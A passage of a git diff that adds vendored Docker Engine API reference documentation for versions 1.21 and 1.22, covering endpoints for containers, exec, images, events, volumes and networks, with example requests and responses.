"Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause + +Docker images report the following events: + + delete, import, pull, push, tag, untag + +**Example request**: + + GET /v1.21/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status":"pull","id":"busybox:latest","time":1442421700,"timeNano":1442421700598988358} + {"status":"create","id":"5745704abe9caa5","from":"busybox","time":1442421716,"timeNano":1442421716853979870} + {"status":"attach","id":"5745704abe9caa5","from":"busybox","time":1442421716,"timeNano":1442421716894759198} + {"status":"start","id":"5745704abe9caa5","from":"busybox","time":1442421716,"timeNano":1442421716983607193} + +**Query parameters**: + +- **since** – Timestamp. 
Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + - `label=`; -- image and container label to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.21/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. 
+ +**Example request** + + GET /v1.21/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.21/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. 
+ +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "Privileged": true, + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **Privileged** - Boolean value, runs the exec process with extended privileges. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **409** - container is paused +- **500** - server error + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. 
+ +**Example request**: + + POST /v1.21/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **409** - container is paused + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.21/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. 
+ +**Example request**: + + GET /v1.21/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: plain/text + + { + "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39", + "Running" : false, + "ExitCode" : 2, + "ProcessConfig" : { + "privileged" : false, + "user" : "", + "tty" : false, + "entrypoint" : "sh", + "arguments" : [ + "-c", + "exit 2" + ] + }, + "OpenStdin" : false, + "OpenStderr" : false, + "OpenStdout" : false, + "Container" : { + "State" : { + "Status" : "running", + "Running" : true, + "Paused" : false, + "Restarting" : false, + "OOMKilled" : false, + "Pid" : 3650, + "ExitCode" : 0, + "Error" : "", + "StartedAt" : "2014-11-17T22:26:03.717657531Z", + "FinishedAt" : "0001-01-01T00:00:00Z" + }, + "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c", + "Created" : "2014-11-17T22:26:03.626304998Z", + "Path" : "date", + "Args" : [], + "Config" : { + "Hostname" : "8f177a186b97", + "Domainname" : "", + "User" : "", + "AttachStdin" : false, + "AttachStdout" : false, + "AttachStderr" : false, + "ExposedPorts" : null, + "Tty" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ], + "Cmd" : [ + "date" + ], + "Image" : "ubuntu", + "Volumes" : null, + "WorkingDir" : "", + "Entrypoint" : null, + "NetworkDisabled" : false, + "MacAddress" : "", + "OnBuild" : null, + "SecurityOpt" : null + }, + "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5", + "NetworkSettings" : { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": 
"", + "MacAddress": "", + "Networks": { + "bridge": { + "EndpointID": "", + "Gateway": "", + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "" + } + } + }, + "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf", + "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname", + "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Name" : "/test", + "Driver" : "aufs", + "ExecDriver" : "native-0.2", + "MountLabel" : "", + "ProcessLabel" : "", + "AppArmorProfile" : "", + "RestartCount" : 0, + "Mounts" : [] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +### 2.4 Volumes + +#### List volumes + +`GET /volumes` + +**Example request**: + + GET /v1.21/volumes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Volumes": [ + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + ] + } + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. 
There is one available filter: `dangling=true` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a volume + +`POST /volumes/create` + +Create a volume + +**Example request**: + + POST /v1.21/volumes/create HTTP/1.1 + Content-Type: application/json + + { + "Name": "tardis" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + +**Status codes**: + +- **201** - no error +- **500** - server error + +**JSON parameters**: + +- **Name** - The new volume's name. If not specified, Docker generates a name. +- **Driver** - Name of the volume driver to use. Defaults to `local` for the name. +- **DriverOpts** - A mapping of driver options and values. These options are + passed directly to the driver and are driver specific. + +#### Inspect a volume + +`GET /volumes/(name)` + +Return low-level information on the volume `name` + +**Example request**: + + GET /v1.21/volumes/tardis HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + +**Status codes**: + +- **200** - no error +- **404** - no such volume +- **500** - server error + +#### Remove a volume + +`DELETE /volumes/(name)` + +Instruct the driver to remove the volume (`name`). 
+ +**Example request**: + + DELETE /v1.21/volumes/tardis HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such volume or volume driver +- **409** - volume is in use and cannot be removed +- **500** - server error + +### 2.5 Networks + +#### List networks + +`GET /networks` + +**Example request**: + + GET /v1.21/networks HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } + }, + { + "Name": "none", + "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794", + "Scope": "local", + "Driver": "null", + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + }, + { + "Name": "host", + "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e", + "Scope": "local", + "Driver": "host", + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + } +] +``` + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the networks list. 
Available filters: `name=[network-names]` , `id=[network-ids]` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Inspect network + +`GET /networks/` + +**Example request**: + + GET /v1.21/networks/f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566 HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - network not found + +#### Create a network + +`POST /networks/create` + +Create a network + +**Example request**: + +``` +POST /v1.21/networks/create HTTP/1.1 +Content-Type: application/json + +{ + "Name":"isolated_nw", + "CheckDuplicate":true, + "Driver":"bridge", + "IPAM":{ + "Driver": "default", + "Config":[ + { + "Subnet":"172.20.0.0/16", + "IPRange":"172.20.10.0/24", + "Gateway":"172.20.10.11" + } + ] + } +} +``` + +**Example response**: + +``` +HTTP/1.1 201 Created +Content-Type: application/json + +{ + "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30", + "Warning": "" +} +``` + +**Status codes**: + +- **201** - no error +- **404** - plugin not found +- **500** - server 
error + +**JSON parameters**: + +- **Name** - The new network's name. this is a mandatory field +- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false` +- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver +- **IPAM** - Optional custom IP scheme for the network + - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver + - **Config** - List of IPAM configuration options, specified as a map: + `{"Subnet": , "IPRange": , "Gateway": , "AuxAddress": }` +- **Options** - Network specific options to be used by the drivers + +#### Connect a container to a network + +`POST /networks/(id)/connect` + +Connect a container to a network + +**Example request**: + +``` +POST /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4" +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container is not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **container** - container-id/name to be connected to the network + +#### Disconnect a container from a network + +`POST /networks/(id)/disconnect` + +Disconnect a container from a network + +**Example request**: + +``` +POST /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4" +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **Container** - container-id/name to be disconnected from a network + +#### Remove a network + +`DELETE /networks/(id)` + +Instruct the driver to remove the network (`id`). 
+ +**Example request**: + + DELETE /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - no such network +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. 
Set * (asterisk) allows all, +default or blank means CORS disabled + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.22.md b/vendor/github.com/docker/docker/docs/api/v1.22.md new file mode 100644 index 0000000000..e94081344c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.22.md @@ -0,0 +1,3307 @@ +--- +title: "Engine API v1.22" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.22/ +- /reference/api/docker_remote_api_v1.22/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + +## 2. 
Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.22/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:02" + } + } + } + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.8", + "IPPrefixLen": 16, + 
"IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:08" + } + } + } + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.6", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:06" + } + } + } + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.5", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:05" + } + } + } + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. 
+ Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`|`dead`) + - `label=key` or `label="key=value"` of a container label + - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only) + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.22/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "StopSignal": "SIGTERM", + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Tmpfs": { "/run": "rw,noexec,nosuid,size=65536k" }, + "Links": ["redis3:redis"], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + 
"BlkioWeight": 300, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceWriteIOps": [{}], + "MemorySwappiness": 60, + "OomKillDisable": false, + "OomScoreAdj": 500, + "PidMode": "", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsOptions": [""], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "", + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "NetworkingConfig": { + "EndpointsConfig": { + "isolated_nw" : { + "IPAMConfig": { + "IPv4Address":"172.20.30.33", + "IPv6Address":"2001:db8:abcd::3033" + }, + "Links":["container_1", "container_2"], + "Aliases":["server_x", "server_y"] + } + } + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. 
+- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default. +- **HostConfig** + - **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + + `volume-name:container-dest` to bind-mount a volume managed by a + volume driver into the container. `container-dest` must be an + _absolute_ path. + + `volume-name:container-dest:ro` to mount the volume read-only + inside the container. `container-dest` must be an _absolute_ path. + - **Tmpfs** – A map of container directories which should be replaced by tmpfs mounts, and their corresponding + mount options. A JSON object in the form `{ "/run": "rw,noexec,nosuid,size=65536k" }`. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. 
+ - **Memory** - Memory limit in bytes.
+ - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap.
+ You must use this with `memory` and make the swap value larger than `memory`.
+ - **MemoryReservation** - Memory soft limit in bytes.
+ - **KernelMemory** - Kernel memory limit in bytes.
+ - **CpuShares** - An integer value containing the container's CPU Shares
+ (ie. the relative weight vs other containers).
+ - **CpuPeriod** - The length of a CPU period in microseconds.
+ - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period.
+ - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use.
+ - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+ - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+ - **BlkioWeightDevice** - Block IO weight (relative device weight) in the form of: `"BlkioWeightDevice": [{"Path": "device_path", "Weight": weight}]`
+ - **BlkioDeviceReadBps** - Limit read rate (bytes per second) from a device in the form of: `"BlkioDeviceReadBps": [{"Path": "device_path", "Rate": rate}]`, for example:
+ `"BlkioDeviceReadBps": [{"Path": "/dev/sda", "Rate": "1024"}]`
+ - **BlkioDeviceWriteBps** - Limit write rate (bytes per second) to a device in the form of: `"BlkioDeviceWriteBps": [{"Path": "device_path", "Rate": rate}]`, for example:
+ `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]`
+ - **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of: `"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
